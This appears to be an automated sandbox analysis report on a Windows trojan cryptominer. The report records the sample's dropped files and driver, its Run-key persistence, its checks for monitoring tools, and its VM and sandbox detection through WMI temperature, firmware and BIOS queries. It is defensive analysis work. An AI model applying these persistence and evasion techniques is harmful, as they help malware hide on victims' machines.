      Source: 4LX9x1PMAW.exe, 00000000.00000003.3229268657.000003647E1F2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinRing0.sys2 vs 4LX9x1PMAW.exe
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3339978275.000003647E3FF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs 4LX9x1PMAW.exe
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3263574116.000003647C660000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exeD vs 4LX9x1PMAW.exe
      Source: 4LX9x1PMAW.exe, 00000000.00000000.2123706061.00007FF6A76F3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesvchost.exeD vs 4LX9x1PMAW.exe
      Source: 4LX9x1PMAW.exeBinary or memory string: OriginalFilenamesvchost.exeD vs 4LX9x1PMAW.exe
      Source: windowsaudioservice.exe.0.drStatic PE information: Section: ZLIB complexity 1.0071614583333333
      Source: windowsaudioservice.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.5
      Source: svhost.exe.0.drBinary string: AfdPollInfo\Device\Afd\Mio
      Source: svhost.exe.0.drBinary string: Failed to open \Device\Afd\Mio:
      Source: WinRing0x64.sys.0.drBinary string: \Device\WinRing0_1_2_0
      Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@6/3@1/2
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6CC740 GetDiskFreeSpaceExW,7_2_00007FF7AF6CC740
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6C8B80 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,7_2_00007FF7AF6C8B80
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeFile created: C:\Users\user\AppData\Local\WindowsJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_03
      Source: 4LX9x1PMAW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 4LX9x1PMAW.exeVirustotal: Detection: 12%
      Source: 4LX9x1PMAW.exeReversingLabs: Detection: 21%
      Source: 4LX9x1PMAW.exeString found in binary or memory: /load_hpack; header malformed -- pseudo not at head of block
      Source: unknownProcess created: C:\Users\user\Desktop\4LX9x1PMAW.exe "C:\Users\user\Desktop\4LX9x1PMAW.exe"
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeProcess created: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exe "C:\Users\user\AppData\Local\Windows\windowsaudioservice.exe"
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Windows\svhost.exe "C:\Users\user\AppData\Local\Windows\svhost.exe"
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeProcess created: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exe "C:\Users\user\AppData\Local\Windows\windowsaudioservice.exe"Jump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: pdh.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: perfos.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: opencl.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: explorerframe.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeSection loaded: pdh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32Jump to behavior
      Source: 4LX9x1PMAW.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: 4LX9x1PMAW.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: 4LX9x1PMAW.exeStatic file information: File size 3414528 > 1048576
      Source: 4LX9x1PMAW.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x20aa00
      Source: 4LX9x1PMAW.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x10f000
      Source: 4LX9x1PMAW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: 4LX9x1PMAW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: 4LX9x1PMAW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: 4LX9x1PMAW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: 4LX9x1PMAW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: 4LX9x1PMAW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: 4LX9x1PMAW.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: 4LX9x1PMAW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 4LX9x1PMAW.exe, 00000000.00000003.3229268657.000003647E1F2000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.0.dr
      Source: 4LX9x1PMAW.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: 4LX9x1PMAW.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: 4LX9x1PMAW.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: 4LX9x1PMAW.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: 4LX9x1PMAW.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
      Source: 4LX9x1PMAW.exeStatic PE information: section name: _RDATA
      Source: svhost.exe.0.drStatic PE information: section name: _RDATA
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name:
      Source: windowsaudioservice.exe.0.drStatic PE information: section name: .themida
      Source: windowsaudioservice.exe.0.drStatic PE information: section name: .boot
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeCode function: 5_2_0014C552 push ecx; retf 5_2_0014C559
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeCode function: 5_2_0014E41C pushad ; retf 5_2_0014E41D
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeCode function: 5_2_0014CC5A pushad ; iretd 5_2_0014CCB9
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeCode function: 5_2_0014CEDA pushad ; iretd 5_2_0014CEE1
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeCode function: 5_2_0014E204 pushad ; retf 5_2_0014E205
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeCode function: 5_2_0014CA82 push ecx; retf 5_2_0014CAA9
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeCode function: 5_2_0014CDF2 pushad ; iretd 5_2_0014CE29
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeCode function: 5_2_0014CE2A pushad ; iretd 5_2_0014CED9
      Source: windowsaudioservice.exe.0.drStatic PE information: section name: entropy: 7.839104982881267
      Source: windowsaudioservice.exe.0.drStatic PE information: section name: entropy: 7.8717398799845935
      Source: windowsaudioservice.exe.0.drStatic PE information: section name: entropy: 7.770884661840453

      Persistence and Installation Behavior

      barindex
      Sample is not signed and drops a device driver
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeFile created: C:\Users\user\AppData\Local\Windows\WinRing0x64.sysJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeFile created: C:\Users\user\AppData\Local\Windows\svhost.exeJump to dropped file
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeFile created: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeJump to dropped file
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeFile created: C:\Users\user\AppData\Local\Windows\WinRing0x64.sysJump to dropped file

      Boot Survival

      barindex
      Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeWindow searched: window name: RegmonClassJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeWindow searched: window name: FilemonClassJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svhost.exeJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svhost.exeJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 1111
      Source: unknownNetwork traffic detected: HTTP traffic on port 1111 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 1111
      Source: unknownNetwork traffic detected: HTTP traffic on port 1111 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 1111
      Source: unknownNetwork traffic detected: HTTP traffic on port 1111 -> 49723
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Queries temperature or sensor information (via WMI often done to detect virtual machines)
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSAcpi_ThermalZoneTemperature
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSAcpi_ThermalZoneTemperature
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSAcpi_ThermalZoneTemperature
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSAcpi_ThermalZoneTemperature
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSAcpi_ThermalZoneTemperature
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSAcpi_ThermalZoneTemperature
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSAcpi_ThermalZoneTemperature
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSAcpi_ThermalZoneTemperature
      Query firmware table information (likely to detect VMs)
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSystem information queried: FirmwareTableInformationJump to behavior
      Tries to detect sandboxes / dynamic malware analysis system (registry check)
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Windows\WinRing0x64.sysJump to dropped file
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeAPI coverage: 2.3 %
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V bwygjysogxfytqn Bus
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3291826667.000001DDB1038000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid PartitionA
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3287052376.000001DDAF813000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
